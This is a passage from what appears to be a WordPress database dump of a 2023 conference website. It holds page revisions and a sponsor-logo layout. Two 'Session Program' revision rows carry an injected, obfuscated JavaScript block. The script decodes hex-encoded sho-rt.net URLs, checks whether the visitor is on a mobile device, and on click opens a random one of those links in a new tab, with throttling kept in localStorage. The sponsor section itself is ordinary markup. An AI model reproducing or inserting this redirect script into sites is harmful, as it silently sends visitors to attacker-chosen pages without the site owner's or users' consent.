_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:49:57','2023-08-23 08:49:57','',5122,'https://gsw2023.com/?p=5396',0,'revision','',0),
(5397,1,'2023-08-23 08:52:10','2023-08-23 08:52:10','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:52:10','2023-08-23 08:52:10','',5122,'https://gsw2023.com/?p=5397',0,'revision','',0),
(5398,1,'2023-08-24 04:14:25','2023-08-24 04:14:25','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" 